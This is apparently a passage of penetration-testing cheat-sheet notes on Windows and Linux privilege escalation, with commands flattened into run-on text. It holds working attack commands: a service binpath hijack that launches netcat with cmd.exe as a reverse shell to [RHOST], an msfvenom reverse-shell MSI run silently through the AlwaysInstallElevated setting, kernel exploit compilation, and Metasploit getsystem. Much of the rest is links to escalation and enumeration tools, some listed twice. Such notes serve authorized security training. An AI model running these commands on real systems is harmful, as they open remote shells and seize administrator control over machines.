Users c:\ accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ Find all weak file permissions per drive. accesschk.exe /accepteula -uwsv "Everyone" "C:\Program Files" accesschk.exe /accepteula -uwqs Users c:\*.* accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* Powershell : Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -m Binary planting (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services) sc qc [service_name] // for service properties sc query [service_name] // for service status sc config [service_name] binpath= "C:\Temp\nc.exe -nv [RHOST] [RPORT] - e C:\WINDOWS\System32\cmd.exe" sc config [service_name] obj= ".\LocalSystem" password= "" net start [service_name] Unquoted Service Path Privilege Escalation https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ wmic service get name,displayname,pathname,startmode |findstr /i "Auto" Always Install Elevated : reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer 1 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 –f msi > i C:> msiexec /quiet /qn /i install.msi Kernel Exploits : https://github.com/abatchy17/WindowsExploits https://github.com/SecWiki/windows-kernel-exploits run systeminfo | capture the output and run windows-exploit-suggester.py Compiling Kernel Exploits : i686-w64-mingw32-gcc exploit.c -o exploit or for 32 bit i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32 Automated Enumeration Tools Powershell: powershell -ep bypass load powershell (only in meterpreter) Sherlock (https://github.com/rasta-mouse/Sherlock) https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc (PowerUp) EXE : (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#exe) WinPeas [ https://github.com/carlospolop/privilege-escalation-awesome-scripts- suite/tree/master/winPEAS ] Accesschk.exe [https://github.com/jivoi/pentest/blob/master/post_win/accesschk_exe] PowerUp (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) Seatbelt (https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt) Other : Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit- Suggester) Metasploit : getsystem run post/multi/recon/local_ exploit_ suggester Resources : https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%2 0and%20Resources/Windows%20-%20Privilege%20Escalation.md https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ http://www.fuzzysecurity.com/tutorials/16.html https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation (Win PrivEsc Checlist) https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ Enumeration Tools : https://github.com/Tib3rius/AutoRecon https://bitbucket.org/xaeroborg/python3-programs/src https://github.com/21y4d/nmapAutomator Linux Privilege escalation Tools : Linux Exploit Suggester (https://github.com/mzet-/linux-exploit-suggester) SUIDENUM (https://github.com/Anon-Exploiter/SUID3NUM) LinEnum.sh (https://github.com/rebootuser/LinEnum) linpeas.sh (https://github.com/carlospolop/privilege-escalation-awesome-scripts- suite/tree/master/linPEAS) Linprivchecker (https://github.com/sleventyeleven/linuxprivchecker) pspy (https://github.com/DominicBreuker/pspy) (crontabs) Windows Privilege Escalation Tools Powershell: powershell -ep bypass load powershell (only in meterpreter) Sherlock (https://github.com/rasta-mouse/Sherlock) https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc (PowerUp) EXE : (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#exe) WinPeas [ https://github.com/carlospolop/privilege-escalation-awesome-scripts- suite/tree/master/winPEAS ] Accesschk.exe [https://github.com/jivoi/pentest/blob/master/post_win/accesschk_exe] PowerUp (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) Seatbelt (https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt) Others: Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit- Suggester)